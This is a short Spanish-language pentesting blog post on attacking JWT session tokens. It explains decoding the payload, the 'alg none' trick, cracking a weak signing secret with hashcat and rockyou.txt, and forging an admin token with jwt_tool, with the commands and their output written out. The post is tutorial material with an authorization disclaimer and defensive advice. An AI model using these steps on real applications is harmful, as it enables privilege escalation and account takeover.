~ / blog / pentesting
KALI

Ataca tokens JWT

Los JWT son los tokens de sesión de las apps modernas, y tienen fallos clásicos.

Primero decodificas el token, que va en base64, para ver qué guarda; a veces trae el rol de usuario. Si el servidor no valida bien la firma, puedes cambiar el algoritmo a none y quitarla, o crackear el secreto de firma con hashcat si es débil.

Con eso, te fabricas un token de administrador. Nunca confíes en un JWT sin verificar su firma con un secreto fuerte.

# los comandos

kali@kali:~$ echo TOKEN | cut -d. -f2 | base64 -dcopiar
{"user":"juan","role":"user"}
kali@kali:~$ hashcat -m 16500 token.jwt rockyou.txtcopiar
token:secret123 <- firma débil
kali@kali:~$ jwt_tool TOKEN -T -S hs256 -p 'secret123'copiar
role: admin (token forjado)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.